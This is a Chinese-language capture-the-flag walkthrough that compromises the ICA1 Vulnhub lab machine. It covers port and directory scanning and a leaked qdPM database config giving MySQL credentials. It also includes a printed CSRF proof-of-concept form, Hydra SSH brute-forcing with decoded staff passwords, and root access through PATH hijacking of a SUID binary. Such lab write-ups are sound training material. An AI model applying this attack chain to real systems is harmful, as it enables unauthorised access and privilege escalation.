ICA1-Vulnhub

本机ip

192.1.1.6

靶机ip

192.1.1.18

内网探测

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6c:40:99, IPv4: 192.1.1.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.1.1.1       00:50:56:c0:00:08       VMware, Inc.
192.1.1.2       00:50:56:e4:e9:e5       VMware, Inc.
192.1.1.8       00:0c:29:f7:da:7d       VMware, Inc.
192.1.1.254     00:50:56:f6:b4:f4       VMware, Inc.

端口探测

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.1.1.8 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 08:50 EDT
Nmap scan report for 192.1.1.8
Host is up (0.00031s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
|   256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_  256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp    open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp  open  mysql   MySQL 8.0.26
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.26
|   Thread ID: 40
|   Capabilities flags: 65535
|   Some Capabilities: FoundRows, Support41Auth, InteractiveClient, SupportsCompression, SupportsTransactions, ConnectWithDatabase, SwitchToSSLAfterHandshake, LongPassword, Speaks41ProtocolNew, SupportsLoadDataLocal, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: jw\x08ph:TwE\x05<dZ@1PV`:>
|_  Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after:  2031-09-23T10:47:29
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=8/17%Time=66C09CA7%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTT
SF:POptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSV
SF:ersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTC
SF:P,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCoo
SF:kie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messag
SF:e\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNe
SF:g,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05
SF:HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDStri
SF:ng,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x
SF:01\x08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x2
SF:0message\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(
SF:LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Note
SF:sRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1
SF:a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,3
SF:2,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Inva
SF:lid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x0
SF:5\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000");
MAC Address: 00:0C:29:F7:DA:7D (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.1.1.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.79 seconds

漏洞扫描

┌──(root㉿kali)-[~]
└─# nikto -h 192.1.1.8
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.1.1.8
+ Target Hostname:    192.1.1.8
+ Target Port:        80
+ Start Time:         2024-08-17 08:51:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.48 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie qdPM8 created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.48 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS).
+ /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS).
+ /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS).
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
^[[D+ /install/: This might be interesting.
+ /readme.txt: This might be interesting.
+ /template/: Directory indexing found.
+ /template/: This might be interesting: could have sensitive files or system information.
+ /manual/: Web server manual found.
^[[1;5C+ /manual/images/: Directory indexing found.
+ /images/: Directory indexing found.
^[[1;5C+ 8076 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-08-17 08:51:50 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

扫到两个可能可以利用的点

目录索引和敏感文件:

• /css/, /template/, /images/: 这些目录启用了目录索引功能，这意味着目录下的文件列表可以被直接访问，可能会暴露敏感信息。
• /manual/: Web服务器手册被公开，这可能泄露服务器配置或其他信息。
• /readme.txt: 发现了一个README文件，可能包含有关该服务器或其配置的重要信息。

潜在的XSS漏洞:

• /index.php: 在多个URL参数中发现了潜在的跨站脚本（XSS）漏洞，攻击者可能通过这些漏洞执行恶意脚本。

feroxbuster目录扫描

[####################] - 3m   2851066/2851066 0s      found:533     errors:1733873
[####################] - 52s    30000/30000   580/s   http://192.1.1.8/ 
[####################] - 0s     30000/30000   967742/s http://192.1.1.8/images/ => Directory listing
[####################] - 3s     30000/30000   10409/s http://192.1.1.8/uploads/ => Directory listing
[####################] - 66s    30000/30000   454/s   http://192.1.1.8/install/ 
[####################] - 1s     30000/30000   39683/s http://192.1.1.8/images/tableListing/ => Directory listing
[####################] - 8s     30000/30000   3862/s  http://192.1.1.8/images/fileicons/ => Directory listing
[####################] - 8s     30000/30000   3868/s  http://192.1.1.8/images/icons/ => Directory listing
[####################] - 0s     30000/30000   3750000/s http://192.1.1.8/template/scripts/ => Directory listing
[####################] - 0s     30000/30000   30000000/s http://192.1.1.8/uploads/users/ => Directory listing
[####################] - 0s     30000/30000   15000000/s http://192.1.1.8/template/ => Directory listing
[####################] - 3s     30000/30000   10363/s http://192.1.1.8/template/plugins/uniform/ => Directory listing
[####################] - 3s     30000/30000   10363/s http://192.1.1.8/template/fonts/ => Directory listing
[####################] - 5s     30000/30000   6573/s  http://192.1.1.8/template/css/ => Directory listing
[####################] - 5s     30000/30000   6471/s  http://192.1.1.8/js/ => Directory listing
[####################] - 5s     30000/30000   6589/s  http://192.1.1.8/template/plugins/ => Directory listing
[####################] - 3s     30000/30000   9521/s  http://192.1.1.8/template/img/ => Directory listing
[####################] - 7s     30000/30000   4078/s  http://192.1.1.8/template/plugins/bootstrap/ => Directory listing
[####################] - 5s     30000/30000   6472/s  http://192.1.1.8/template/plugins/bootstrap-datepicker/ => Directory listing
[####################] - 51s    30000/30000   586/s   http://192.1.1.8/javascript/ 
[####################] - 70s    30000/30000   428/s   http://192.1.1.8/javascript/jquery/ 
[####################] - 4s     30000/30000   6904/s  http://192.1.1.8/core/ => Directory listing
[####################] - 0s     30000/30000   30000000/s http://192.1.1.8/core/cache/ => Directory listing
[####################] - 65s    30000/30000   465/s   http://192.1.1.8/manual/ 
[####################] - 0s     30000/30000   15000000/s http://192.1.1.8/core/cache/qdPM/ => Directory listing
[####################] - 7s     30000/30000   4200/s  http://192.1.1.8/core/lib/ => Directory listing
[####################] - 6s     30000/30000   5165/s  http://192.1.1.8/manual/images/ => Directory listing
[####################] - 60s    30000/30000   503/s   http://192.1.1.8/manual/en/ 
[####################] - 0s     30000/30000   7500000/s http://192.1.1.8/css/ => Directory listing
[####################] - 66s    30000/30000   453/s   http://192.1.1.8/manual/de/ 
[####################] - 5s     30000/30000   5564/s  http://192.1.1.8/css/skins/ => Directory listing
[####################] - 5s     30000/30000   6394/s  http://192.1.1.8/css/img/ => Directory listing
[####################] - 5s     30000/30000   6004/s  http://192.1.1.8/manual/style/ => Directory listing
[####################] - 66s    30000/30000   454/s   http://192.1.1.8/manual/es/ 
[####################] - 5s     30000/30000   5707/s  http://192.1.1.8/manual/style/scripts/ => Directory listing
[####################] - 5s     30000/30000   5697/s  http://192.1.1.8/manual/style/css/ => Directory listing
[####################] - 0s     30000/30000   7500000/s http://192.1.1.8/css/skins/dark/ => Directory listing
[####################] - 5s     30000/30000   5682/s  http://192.1.1.8/manual/style/latex/ => Directory listing
[####################] - 61s    30000/30000   492/s   http://192.1.1.8/manual/ru/ 
[####################] - 69s    30000/30000   438/s   http://192.1.1.8/manual/ru/faq/ 
[####################] - 63s    30000/30000   476/s   http://192.1.1.8/manual/ru/ssl/ 
[####################] - 47s    30000/30000   633/s   http://192.1.1.8/manual/ru/mod/ 
[####################] - 0s     30000/30000   30000000/s http://192.1.1.8/backups/ => Directory listing
[####################] - 0s     30000/30000   7500000/s http://192.1.1.8/sf/ => Directory listing
[####################] - 0s     30000/30000   30000000/s http://192.1.1.8/sf/sf_web_debug/ => Directory listing
[####################] - 6s     30000/30000   4950/s  http://192.1.1.8/sf/sf_default/ => Directory listing
[####################] - 6s     30000/30000   4666/s  http://192.1.1.8/sf/sf_web_debug/images/ => Directory listing
[####################] - 0s     30000/30000   10000000/s http://192.1.1.8/template/plugins/jquery-slimscroll/ => Directory listing
[####################] - 0s     30000/30000   15000000/s http://192.1.1.8/template/plugins/font-awesome/ => Directory listing
[####################] - 0s     30000/30000   10000000/s http://192.1.1.8/css/skins/default/ => Directory listing
[####################] - 3m     30000/30000   174/s   http://192.1.1.8/index.php/               

访问web界面

访问后发现/core/中存在敏感信息泄露

http://192.1.1.8/core/config/databases.yml

all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true  

账号：qdpmadmin
密码：UcVQCMQk2STVeS6J

查找poc

根据qdPM 9.2查找相关poc

┌──(root㉿kali)-[~]
└─# searchsploit qdPM 9.2  
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
qdPM 9.2 - Cross-site Request Forgery (CSRF)                                                                                               | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated)                                                                                             | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿kali)-[~]
└─# cat 50854.txt 
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------

Steps to Exploit :
        1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
        2) send it to victim.

<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf&#95;method" value="put" />
      <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
      <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
      <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
      <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
      <input type="hidden" name="users&#91;photo&#93;" value="" />
      <input type="hidden" name="users&#91;culture&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>             

┌──(root㉿kali)-[~]
└─# cat 50176.txt 
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.         

第二个就是刚才已经找到的

连数据库

┌──(root㉿kali)-[~]
└─# mysql -uqdpmadmin -p -h 192.1.1.8
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 14123
Server version: 8.0.26 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 

查找可以利用的数据

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+
6 rows in set (0.008 sec)

MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [qdpm]> show tables
    -> ;
+----------------------+
| Tables_in_qdpm       |
+----------------------+
| attachments          |
| configuration        |
| departments          |
| discussions          |
| discussions_comments |
| discussions_reports  |
| discussions_status   |
| events               |
| extra_fields         |
| extra_fields_list    |
| phases               |
| phases_status        |
| projects             |
| projects_comments    |
| projects_phases      |
| projects_reports     |
| projects_status      |
| projects_types       |
| tasks                |
| tasks_comments       |
| tasks_groups         |
| tasks_labels         |
| tasks_priority       |
| tasks_status         |
| tasks_types          |
| tickets              |
| tickets_comments     |
| tickets_reports      |
| tickets_status       |
| tickets_types        |
| user_reports         |
| users                |
| users_groups         |
| versions             |
| versions_status      |
+----------------------+
35 rows in set (0.001 sec)

MySQL [qdpm]> select * from users;
Empty set (0.001 sec)

MySQL [qdpm]> select * from users_groups ;
+----+-----------+----------------+-----------------------+--------------------+----------------------+--------------------+----------------------------+-----------------------------+--------------------------+-----------------------------------+
| id | name      | allow_view_all | allow_manage_projects | allow_manage_tasks | allow_manage_tickets | allow_manage_users | allow_manage_configuration | allow_manage_tasks_viewonly | allow_manage_discussions | allow_manage_discussions_viewonly |
+----+-----------+----------------+-----------------------+--------------------+----------------------+--------------------+----------------------------+-----------------------------+--------------------------+-----------------------------------+
|  1 | Admin     |              1 |                     1 |                  1 |                    1 |                  1 |                          1 |                        NULL |                        1 |                              NULL |
|  2 | Developer |           NULL |                     1 |                  1 |                 NULL |               NULL |                       NULL |                        NULL |                     NULL |                              NULL |
|  3 | Client    |           NULL |                  NULL |               NULL |                    1 |               NULL |                       NULL |                        NULL |                     NULL |                              NULL |
|  4 | Manager   |              1 |                     1 |                  1 |                    1 |                  1 |                       NULL |                        NULL |                     NULL |                              NULL |
|  5 | Designer  |           NULL |                  NULL |                  1 |                 NULL |               NULL |                       NULL |                           1 |                     NULL |                              NULL |
+----+-----------+----------------+-----------------------+--------------------+----------------------+--------------------+----------------------------+-----------------------------+--------------------------+-----------------------------------+
5 rows in set (0.001 sec)

MySQL [qdpm]> use staff;;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department      |
| login           |
| user            |
+-----------------+
3 rows in set (0.001 sec)

MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
|    1 |       2 | c3VSSkFkR3dMcDhkeTNyRg== |
|    2 |       4 | N1p3VjRxdGc0MmNtVVhHWA== |
|    3 |       1 | WDdNUWtQM1cyOWZld0hkQw== |
|    4 |       3 | REpjZVZ5OThXMjhZN3dMZw== |
|    5 |       5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> 

base64解码密码后列出

账号：
meyer
dexter
travis
lucas
smith
 
密码：（解密后）
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
cqNnBWCByS2DuJSy
DJceVy98W28Y7wLg

海德拉碰撞

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -L user.txt -P pass.txt ssh://192.1.1.8  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-17 09:15:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://192.1.1.8:22/
[22][ssh] host: 192.1.1.8   login: travis   password: DJceVy98W28Y7wLg
[22][ssh] host: 192.1.1.8   login: dexter   password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-17 09:15:46

分别ssh连接

travis

Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ ls
user.txt
travis@debian:~$ cat user.txt
ICA{Secret_Project}
travis@debian:~$ 

dexter

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh dexter@192.1.1.8   
The authenticity of host '192.1.1.8 (192.1.1.8)' can't be established.
ED25519 key fingerprint is SHA256:xCJPzSxRekyYT6eXmyzAXdY7uAlP5b7vQp+B5XqYsfE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.8' (ED25519) to the list of known hosts.
dexter@192.1.1.8's password: 
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 17 09:18:26 2024 from 192.1.1.1
dexter@debian:~$ ls
note.txt
dexter@debian:~$ cat note.txt 
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.
dexter@debian:~$ 

在我看来，在进入系统时有一个弱点。
据我所知，可执行文件的内容是部分可见的。
我需要知道这里是否有漏洞。

查找具有SUID权限的文件

dexter@debian:~$ find / -perm -u=s -type f 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

查看具有sudo权限的命令，无果

dexter@debian:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

发现get_access具有提权可能性

dexter@debian:~$ strings /opt/get_access|grep cat
cat /root/system.info
dexter@debian:~$ 

由于cat是使用root权限进行查看的，伪造一个cat命令文件，加入/bin/bash，并且添加到环境变量里面去，然后执行该文件，然后调用到cat的时候用到的我们的可执行命令，这样获得root权限。

dexter@debian:~$ cd /home
dexter@debian:/home$ ls
dexter  travis
dexter@debian:/home$ echo "/bin/bash"
/bin/bash
dexter@debian:/home$ echo "/bin/bash" > /tmp/cat
dexter@debian:/home$ export PATH=/tmp:$PATH
dexter@debian:/home$ chmod 777 /tmp/cat
dexter@debian:/home$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dexter@debian:/home$ /opt/get_access
root@debian:/home# whoami
root
root@debian:/home#